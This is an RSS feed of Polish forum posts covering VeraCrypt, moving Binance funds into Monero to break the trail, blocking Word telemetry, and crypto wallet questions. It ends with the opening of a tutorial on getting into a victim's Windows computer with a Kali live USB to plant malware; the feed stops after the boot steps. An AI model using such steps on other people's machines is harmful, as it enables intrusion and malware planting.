<a href="https://ibb.co/GfDBDNHY" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/fVWBWLD6/9.png" loading="lazy"  alt="[Obrazek: 9.png]" class="mycode_img" /></a><br />
<br />
Sukces!<br />
<br />
<a href="https://ibb.co/GvgXrmDX" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/svLhX74h/10.png" loading="lazy"  alt="[Obrazek: 10.png]" class="mycode_img" /></a><br />
<br />
Klikaj "Exit" albo "Next" jeśli chcesz utworzyć kolejny szyfrowany wolumin.<br />
<br />
<a href="https://ibb.co/PzTs0Lgq" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/FqskCrzR/11.png" loading="lazy"  alt="[Obrazek: 11.png]" class="mycode_img" /></a><br />
<br />
<span style="font-size: large;" class="mycode_size">Po utworzeniu możesz:</span><br />
<br />
W VeraCrypt kliknąć "Select File" → wybierz swój .hc<br />
<a href="https://ibb.co/6RqkLywY" target="_blank" rel="noopener" class="mycode_url"><br />
<img src="https://i.ibb.co/1f4kj0QZ/12.png" loading="lazy"  alt="[Obrazek: 12.png]" class="mycode_img" /></a><br />
<br />
Wybierz slot , obojętne który.<br />
<br />
<a href="https://ibb.co/0RZF3fxN" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/fztn7CsR/13.png" loading="lazy"  alt="[Obrazek: 13.png]" class="mycode_img" /></a><br />
<br />
Kliknij "Mount", wpisz hasło<br />
<br />
<a href="https://ibb.co/Z63CMDTt" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/GvXj5SPB/14.png" loading="lazy"  alt="[Obrazek: 14.png]" class="mycode_img" /></a><br />
<br />
<a href="https://ibb.co/5W1F2rxN" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/GvdTFW3K/15.png" loading="lazy"  alt="[Obrazek: 15.png]" class="mycode_img" /></a><br />
<br />
Poczekaj chwilę na zamontowanie<br />
<br />
<a href="https://ibb.co/qYdD7gf4" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/tp4HQ2tN/16.png" loading="lazy"  alt="[Obrazek: 16.png]" class="mycode_img" /></a><br />
<br />
Voila!<br />
<br />
<a href="https://ibb.co/Cs1xbnfQ" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/7NY7nGqK/17.png" loading="lazy"  alt="[Obrazek: 17.png]" class="mycode_img" /></a><br />
<br />
Gotowe – działa jak dysk<br />
<br />
<a href="https://ibb.co/zTyJSJ1G" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/mVL8H8m6/18.png" loading="lazy"  alt="[Obrazek: 18.png]" class="mycode_img" /></a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Krypto płatności,  czy da się bezpieczniej?]]></title>
			<link>https://dopal.org/showthread.php?tid=5691</link>
			<pubDate>Fri, 23 May 2025 20:49:01 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=4920">HeisenBerg</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=5691</guid>
			<description><![CDATA[Żyjemy w czasach, gdzie każdy ruch Twoich cyfrowych pieniędzy zostawia ślad – a większość ludzi nawet nie zdaje sobie z tego sprawy. Korzystając z giełd KYC takich jak Binance, podpisujesz się pod każdą transakcją. Nie dosłownie, ale metadane nie kłamią.<br />
Chcesz zyskać prywatność? Zrobić to legalnie, ale świadomie? Dobrze trafiłeś. Pokażę Ci, jak krok po kroku uwolnić swoje kryptowaluty z łańcucha powiązań.<br />
<span style="font-weight: bold;" class="mycode_b">Etap 1: Przejście przez most</span><br />
Założenie wstępne: Masz już środki na swoim koncie Binance.<br />
Plan: Wymienimy je na Monero (XMR) – kryptowalutę stworzoną z myślą o prywatności – za pomocą FixedFloat: zdecentralizowanej wymieniarki bez rejestracji.<br />
Instrukcja:<br />
<ol type="1" class="mycode_list"><li>Wejdź na stronę: <a href="https://www.fixedfloat.com" target="_blank" rel="noopener" class="mycode_url">https://www.fixedfloat.com</a> (nie rejestruj się nie ma potrzeby)<br />
</li>
<li>Ustaw wymianę:<ul class="mycode_list"><li>Z: USDT (lub innej kryptowaluty, którą masz na Binance)<br />
</li>
<li>Na: XMR<br />
</li>
</ul>
</li>
<li>Wprowadź kwotę oraz adres swojego portfela Monero.<br />
</li>
<li>FixedFloat wygeneruje Ci adres USDT, na który musisz wysłać środki.<br />
</li>
<li>Przejdź do Binance → „Wypłata krypto” → wybierz USDT → wklej adres z FixedFloat → zaznacz, że „wysyłasz do siebie”.<br />
</li>
<li>Po kilku minutach Twoje środki pojawią się na portfelu Monero – już bez odcisku palca z Binance.<br />
</li>
</ol>
<span style="font-weight: bold;" class="mycode_b">Etap 2: Monero – mistrz kamuflażu</span><br />
Dlaczego Monero?<br />
Monero to kryptowaluta stworzona z myślą o prywatności. W przeciwieństwie do Bitcoina, wszystkie transakcje są domyślnie ukryte – kwoty, adresy, odbiorcy, wszystko.<br />
Portfel Monero GUI – dwie opcje:<br />
Kiedy pobierzesz oficjalny portfel Monero GUI z <a href="https://www.getmonero.org" target="_blank" rel="noopener" class="mycode_url">https://www.getmonero.org</a>, masz dwie opcje:<br />
<ol type="1" class="mycode_list"><li>Pełny węzeł (Full node) – ściągasz cały blockchain (~150 GB). Maksymalna prywatność i niezależność, ale potrzebujesz sporo miejsca i czasu.<br />
</li>
<li>Zdalny węzeł (Remote node) – nie pobierasz blockchaina, portfel łączy się z istniejącym węzłem Monero online. To szybsze, lżejsze i wygodniejsze, choć teoretycznie nieco mniej prywatne (bo zewnętrzny węzeł widzi czas Twojego zapytania).<br />
</li>
</ol>
Możesz skorzystać z oficjalnych publicznych node’ów lub dodać własny, jeśli masz zaufanie.<br />
<span style="font-weight: bold;" class="mycode_b">Etap 3: Gotowe. I co dalej?</span><br />
Masz Monero. Masz spokój. Teraz możesz:<ul class="mycode_list"><li>płacić bez śladów <br />
</li>
<li>trzymać środki bez obaw, że ktoś je analizuje,<br />
</li>
<li>wymieniać je później z powrotem na inne krypto, jeśli zechcesz.<br />
</li>
</ul>
<span style="font-weight: bold;" class="mycode_b">Uwaga końcowa – od Heisenberga</span><br />
Prywatność to nie przestępstwo. To Twoje prawo.<br />
<br />
PS. nie przelewajcie dużych kwot naraz (grozi to blokadą na binance)  używajcie VPN. o VPN'ach które są dobre a które sprzedajne będzie niebawem kolejny POST.]]></description>
			<content:encoded><![CDATA[Żyjemy w czasach, gdzie każdy ruch Twoich cyfrowych pieniędzy zostawia ślad – a większość ludzi nawet nie zdaje sobie z tego sprawy. Korzystając z giełd KYC takich jak Binance, podpisujesz się pod każdą transakcją. Nie dosłownie, ale metadane nie kłamią.<br />
Chcesz zyskać prywatność? Zrobić to legalnie, ale świadomie? Dobrze trafiłeś. Pokażę Ci, jak krok po kroku uwolnić swoje kryptowaluty z łańcucha powiązań.<br />
<span style="font-weight: bold;" class="mycode_b">Etap 1: Przejście przez most</span><br />
Założenie wstępne: Masz już środki na swoim koncie Binance.<br />
Plan: Wymienimy je na Monero (XMR) – kryptowalutę stworzoną z myślą o prywatności – za pomocą FixedFloat: zdecentralizowanej wymieniarki bez rejestracji.<br />
Instrukcja:<br />
<ol type="1" class="mycode_list"><li>Wejdź na stronę: <a href="https://www.fixedfloat.com" target="_blank" rel="noopener" class="mycode_url">https://www.fixedfloat.com</a> (nie rejestruj się nie ma potrzeby)<br />
</li>
<li>Ustaw wymianę:<ul class="mycode_list"><li>Z: USDT (lub innej kryptowaluty, którą masz na Binance)<br />
</li>
<li>Na: XMR<br />
</li>
</ul>
</li>
<li>Wprowadź kwotę oraz adres swojego portfela Monero.<br />
</li>
<li>FixedFloat wygeneruje Ci adres USDT, na który musisz wysłać środki.<br />
</li>
<li>Przejdź do Binance → „Wypłata krypto” → wybierz USDT → wklej adres z FixedFloat → zaznacz, że „wysyłasz do siebie”.<br />
</li>
<li>Po kilku minutach Twoje środki pojawią się na portfelu Monero – już bez odcisku palca z Binance.<br />
</li>
</ol>
<span style="font-weight: bold;" class="mycode_b">Etap 2: Monero – mistrz kamuflażu</span><br />
Dlaczego Monero?<br />
Monero to kryptowaluta stworzona z myślą o prywatności. W przeciwieństwie do Bitcoina, wszystkie transakcje są domyślnie ukryte – kwoty, adresy, odbiorcy, wszystko.<br />
Portfel Monero GUI – dwie opcje:<br />
Kiedy pobierzesz oficjalny portfel Monero GUI z <a href="https://www.getmonero.org" target="_blank" rel="noopener" class="mycode_url">https://www.getmonero.org</a>, masz dwie opcje:<br />
<ol type="1" class="mycode_list"><li>Pełny węzeł (Full node) – ściągasz cały blockchain (~150 GB). Maksymalna prywatność i niezależność, ale potrzebujesz sporo miejsca i czasu.<br />
</li>
<li>Zdalny węzeł (Remote node) – nie pobierasz blockchaina, portfel łączy się z istniejącym węzłem Monero online. To szybsze, lżejsze i wygodniejsze, choć teoretycznie nieco mniej prywatne (bo zewnętrzny węzeł widzi czas Twojego zapytania).<br />
</li>
</ol>
Możesz skorzystać z oficjalnych publicznych node’ów lub dodać własny, jeśli masz zaufanie.<br />
<span style="font-weight: bold;" class="mycode_b">Etap 3: Gotowe. I co dalej?</span><br />
Masz Monero. Masz spokój. Teraz możesz:<ul class="mycode_list"><li>płacić bez śladów <br />
</li>
<li>trzymać środki bez obaw, że ktoś je analizuje,<br />
</li>
<li>wymieniać je później z powrotem na inne krypto, jeśli zechcesz.<br />
</li>
</ul>
<span style="font-weight: bold;" class="mycode_b">Uwaga końcowa – od Heisenberga</span><br />
Prywatność to nie przestępstwo. To Twoje prawo.<br />
<br />
PS. nie przelewajcie dużych kwot naraz (grozi to blokadą na binance)  używajcie VPN. o VPN'ach które są dobre a które sprzedajne będzie niebawem kolejny POST.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Uniemożliwienie inwigilacji poszczególnym programom.]]></title>
			<link>https://dopal.org/showthread.php?tid=5467</link>
			<pubDate>Thu, 27 Mar 2025 15:41:48 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=4327">doxyou</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=5467</guid>
			<description><![CDATA[<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Jak pewnie wiecie, bądź nie wiecie - większość programów codziennego użytku na waszym komputerze, zbiera o was pełny pakiet informacji na podstawie "ulepszania doświadczeń użytkownika".</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Powiem o tym na podstawie <span style="font-style: italic;" class="mycode_i">Microsoft Word</span>, bo jest duża szansa, że ktoś używa właśnie jego do pisania i edycji niektórych obszerniejszych wątków.</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Co zbiera <span style="font-style: italic;" class="mycode_i">Word</span>?</span></span><br />
<br />
<ol type="1" class="mycode_list"><li><span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">OneDrive i SharePoint</span> – Jeśli zapisujecie pliki w chmurze, ich zawartość jest synchronizowana.</span></span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Autokorekta i sugestie pisania</span> – Może przesyłać dane do Microsoftu w celu ulepszenia funkcji edytorskich.</span></span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Telemetria (Diagnostyka) </span>– <span style="font-style: italic;" class="mycode_i">Microsoft </span>zbiera dane o użytkowaniu aplikacji w celu poprawy jej działania.</span></span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Inteligentne usługi Office (np. tłumaczenie, edytor, Copilot) </span>– Przetwarzają tekst w chmurze.</span></span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Historia wersji dokumentów</span> – Jeśli piszecie w trybie online, wcześniejsze wersje pliku mogą być przechowywane na serwerach <span style="font-style: italic;" class="mycode_i">Microsoftu</span>.</span></span><br />
</li>
</ol>
<br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Brzmi nieszkodliwie, wszak to "ulepszanie doświadczenia użytkownika" jak sama nazwa i opis wskazuje, ale:</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Ulepszanie doświadczenia użytkownika to często tylko ładna nazwa dla zbierania danych. <span style="font-style: italic;" class="mycode_i">Microsoft </span>(i nie tylko on) przesyła mnóstwo informacji pod pretekstem poprawy jakości usług, ale w rzeczywistości często chodzi o analizę zachowań użytkowników, rozwój AI i personalizację reklam.</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Oczywiście większość z tych opcji możecie wyłączyć w samych ustawieniach Worda, ale ja wolę wiarygodniejsze metody. </span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Bo robiąc co, bylibyście bardziej pewni, że nikt was nie podgląda? </span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Wyłączając kamerkę od laptopa w ustawieniach, czy fizycznie przecinając jej przewód?</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Najbezpieczniej czuję się, blokując dostęp do internetu (a tym samym możliwość przekazywania danych) programowi, którego zamierzam używać.</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Blokada poprzez <span style="font-weight: bold;" class="mycode_b">firewalla </span>na przykładzie <span style="font-style: italic;" class="mycode_i">Worda </span>na systemie <span style="font-style: italic;" class="mycode_i">Windows</span>:</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">- Otwieramy <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Panel sterowania</span></span> &gt; <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Zapora systemu Windows Defender</span></span></span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">- Po lewej stronie <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Ustawienia zaawansowane</span></span></span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">- W sekcji <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Reguły wychodzące</span></span> klikamy <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Nowa reguła</span></span></span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">- Wybieramy <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Program </span></span>i <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Dalej</span></span></span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">- W sekcji <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Ścieżka programu</span></span> wskazujemy plik <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">WINWORD.EXE</span></span> (albo dowolny inny). Domyślna ścieżka to np. C:\Program Files\Microsoft Office\root\OfficeXX\WINWORD.EXE</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">- Klikamy <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Dalej </span></span>&gt; <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Blokuj połączenie</span></span> i kontynuujemy aż do zakończenia kreatora</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">W tym momencie Word nie ma fizycznej możliwości przesyłania jakichkolwiek danych (na przykład waszych recenzji środków z wiekiem/wagą/wzrostem) do siedziby <span style="font-style: italic;" class="mycode_i">Microsoftu</span>. <img src="https://dopal.org/images/smilies/angel.png" alt="Angel" title="Angel" class="smilie smilie_10" /></span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Delikwentowi można oczywiście zablokować dostęp do internetu na przeróżne inne sposoby, aczkolwiek ten wydaje mi się najprostszym.</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Rzecz jasna, to tylko mały krok w drodze do anonimowości, bo największy szpieg to dziurawy jak gacie Janusza <span style="font-style: italic;" class="mycode_i">Windows</span>, a drugi uruchamia się wraz z założeniem konta na tfu <span style="font-style: italic;" class="mycode_i">Gmail</span>, ale lepszy wróbel w garści niż siusiacz w dupie.</span></span><br />
<br />
<span style="font-family: Trebuchet MS;" class="mycode_font">Powyższy tutorial można zastosować do każdego programu, który do pracy nie wymaga połączenia z internetem: np. <span style="font-style: italic;" class="mycode_i">Photoshop</span>, <span style="font-style: italic;" class="mycode_i">Gimp</span>, <span style="font-style: italic;" class="mycode_i">Notepad </span>i tak dalej. </span>]]></description>
			<content:encoded><![CDATA[<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Jak pewnie wiecie, bądź nie wiecie - większość programów codziennego użytku na waszym komputerze, zbiera o was pełny pakiet informacji na podstawie "ulepszania doświadczeń użytkownika".</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Powiem o tym na podstawie <span style="font-style: italic;" class="mycode_i">Microsoft Word</span>, bo jest duża szansa, że ktoś używa właśnie jego do pisania i edycji niektórych obszerniejszych wątków.</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Co zbiera <span style="font-style: italic;" class="mycode_i">Word</span>?</span></span><br />
<br />
<ol type="1" class="mycode_list"><li><span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">OneDrive i SharePoint</span> – Jeśli zapisujecie pliki w chmurze, ich zawartość jest synchronizowana.</span></span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Autokorekta i sugestie pisania</span> – Może przesyłać dane do Microsoftu w celu ulepszenia funkcji edytorskich.</span></span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Telemetria (Diagnostyka) </span>– <span style="font-style: italic;" class="mycode_i">Microsoft </span>zbiera dane o użytkowaniu aplikacji w celu poprawy jej działania.</span></span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Inteligentne usługi Office (np. tłumaczenie, edytor, Copilot) </span>– Przetwarzają tekst w chmurze.</span></span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Historia wersji dokumentów</span> – Jeśli piszecie w trybie online, wcześniejsze wersje pliku mogą być przechowywane na serwerach <span style="font-style: italic;" class="mycode_i">Microsoftu</span>.</span></span><br />
</li>
</ol>
<br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Brzmi nieszkodliwie, wszak to "ulepszanie doświadczenia użytkownika" jak sama nazwa i opis wskazuje, ale:</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Ulepszanie doświadczenia użytkownika to często tylko ładna nazwa dla zbierania danych. <span style="font-style: italic;" class="mycode_i">Microsoft </span>(i nie tylko on) przesyła mnóstwo informacji pod pretekstem poprawy jakości usług, ale w rzeczywistości często chodzi o analizę zachowań użytkowników, rozwój AI i personalizację reklam.</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Oczywiście większość z tych opcji możecie wyłączyć w samych ustawieniach Worda, ale ja wolę wiarygodniejsze metody. </span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Bo robiąc co, bylibyście bardziej pewni, że nikt was nie podgląda? </span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Wyłączając kamerkę od laptopa w ustawieniach, czy fizycznie przecinając jej przewód?</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Najbezpieczniej czuję się, blokując dostęp do internetu (a tym samym możliwość przekazywania danych) programowi, którego zamierzam używać.</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Blokada poprzez <span style="font-weight: bold;" class="mycode_b">firewalla </span>na przykładzie <span style="font-style: italic;" class="mycode_i">Worda </span>na systemie <span style="font-style: italic;" class="mycode_i">Windows</span>:</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">- Otwieramy <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Panel sterowania</span></span> &gt; <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Zapora systemu Windows Defender</span></span></span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">- Po lewej stronie <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Ustawienia zaawansowane</span></span></span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">- W sekcji <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Reguły wychodzące</span></span> klikamy <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Nowa reguła</span></span></span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">- Wybieramy <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Program </span></span>i <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Dalej</span></span></span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">- W sekcji <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Ścieżka programu</span></span> wskazujemy plik <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">WINWORD.EXE</span></span> (albo dowolny inny). Domyślna ścieżka to np. C:\Program Files\Microsoft Office\root\OfficeXX\WINWORD.EXE</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">- Klikamy <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Dalej </span></span>&gt; <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Blokuj połączenie</span></span> i kontynuujemy aż do zakończenia kreatora</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">W tym momencie Word nie ma fizycznej możliwości przesyłania jakichkolwiek danych (na przykład waszych recenzji środków z wiekiem/wagą/wzrostem) do siedziby <span style="font-style: italic;" class="mycode_i">Microsoftu</span>. <img src="https://dopal.org/images/smilies/angel.png" alt="Angel" title="Angel" class="smilie smilie_10" /></span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Delikwentowi można oczywiście zablokować dostęp do internetu na przeróżne inne sposoby, aczkolwiek ten wydaje mi się najprostszym.</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font">Rzecz jasna, to tylko mały krok w drodze do anonimowości, bo największy szpieg to dziurawy jak gacie Janusza <span style="font-style: italic;" class="mycode_i">Windows</span>, a drugi uruchamia się wraz z założeniem konta na tfu <span style="font-style: italic;" class="mycode_i">Gmail</span>, ale lepszy wróbel w garści niż siusiacz w dupie.</span></span><br />
<br />
<span style="font-family: Trebuchet MS;" class="mycode_font">Powyższy tutorial można zastosować do każdego programu, który do pracy nie wymaga połączenia z internetem: np. <span style="font-style: italic;" class="mycode_i">Photoshop</span>, <span style="font-style: italic;" class="mycode_i">Gimp</span>, <span style="font-style: italic;" class="mycode_i">Notepad </span>i tak dalej. </span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Portfel]]></title>
			<link>https://dopal.org/showthread.php?tid=5428</link>
			<pubDate>Thu, 20 Mar 2025 09:12:00 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=3126">Majkel78</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=5428</guid>
			<description><![CDATA[Siema wszystkim mam pytanie a propo portfeli np btc robicie np co roku nowy czy macie ciągle ten sam i czy wogle jest sens zmieniania portfela co jakiś czas bo słyszałem że są osoby które tak robią ale czy w praktyce coś to daje to nie wiem]]></description>
			<content:encoded><![CDATA[Siema wszystkim mam pytanie a propo portfeli np btc robicie np co roku nowy czy macie ciągle ten sam i czy wogle jest sens zmieniania portfela co jakiś czas bo słyszałem że są osoby które tak robią ale czy w praktyce coś to daje to nie wiem]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Automaty Bitcoin czy potrzebna weryfikacja ?]]></title>
			<link>https://dopal.org/showthread.php?tid=5304</link>
			<pubDate>Sun, 16 Feb 2025 20:09:59 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=1939">enbor1</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=5304</guid>
			<description><![CDATA[Siema czy w bitomatach btc potrzebna jest weryfikacja?]]></description>
			<content:encoded><![CDATA[Siema czy w bitomatach btc potrzebna jest weryfikacja?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[tut] wpierdalanie sie na komputery z windowsem]]></title>
			<link>https://dopal.org/showthread.php?tid=5179</link>
			<pubDate>Tue, 14 Jan 2025 09:18:30 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=1227">Hoxed</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=5179</guid>
			<description><![CDATA[<span style="font-weight: bold;" class="mycode_b">[tut] wpierdalanie sie na komputery z windowsem</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">- patent dziala na komputerach z systemami windows do wydania 11 windy</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Duzymi zaletami patentu sa </span><br />
<br />
<span style="font-style: italic;" class="mycode_i">-Zaplantowanie malware'u bezpośrednio u ofiary z pominięciem całego procesu wysyłki, socjotechniki i utrudnień innych wielu,</span><br />
<span style="font-style: italic;" class="mycode_i">-Możliwość ataku wykonania w pełni offline,</span><br />
<span style="font-style: italic;" class="mycode_i">-Gdy pierdolniesz się w łeb i hasła do swojego komputera zapomnisz,</span><br />
<br />
Uwaga wymaga to fizycznego kontaktu z komputerem / laptopem ofiary, wszystko czego potrzebujemy to pendrive min 8GB. Ale imo 16 GB nada sie jeszcze lepiej, patent jednym z najprostszych sposobow na dostanie sie na komputer jest. <br />
<br />
zaczynamy od pobrania wersji live kali'linuxa <br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite><span style="font-weight: bold;" class="mycode_b"><a href="https://www.kali.org/get-kali/#kali-live" target="_blank" rel="noopener" class="mycode_url">https://www.kali.org/get-kali/#kali-live</a></span></blockquote>
<br />
<br />
<br />
<span style="font-style: italic;" class="mycode_i">oraz stworzenia flashowanego pendriva za pomoca np Rufusa albo Baleny Ether , jesli nie umeisz tego zrobic jest masa poradnikow w internecie. ( <a href="https://www.kali.org/docs/usb/live-usb-install-with-windows/" target="_blank" rel="noopener" class="mycode_url">https://www.kali.org/docs/usb/live-usb-i...h-windows/</a> )</span><br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite><span style="font-style: italic;" class="mycode_i"><a href="https://rufus.ie/pl/" target="_blank" rel="noopener" class="mycode_url">https://rufus.ie/pl/</a></span></blockquote>
<br />
<br />
<br />
<span style="font-style: italic;" class="mycode_i">Teraz tak, jesli masz juz dzialajcego pena wkladasz go w kompa ofiary i bootujesz system. Jednak wchodzisz do Biosu badz UEFI albo Boot Menu (skrot klawiszowy od producenta plyty glownej zalezny.)</span><br />
Najczesciej mozesz spotkac sie z klawiszami <span style="font-weight: bold;" class="mycode_b">F1 - F12 / oraz DEL</span> jesli nie wiesz ktory to po prostu zapierdol po klawiaturze jak po harmonijce, kiedy odpali sie kali <br />
<br />
<span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Uruchamiasz Terminal. </span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">Tworzysz Folder <br />
</span></span><br />
<br />
<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Cytat:</cite>mkdir /mnt/C</blockquote>
<br />
<br />
<br />
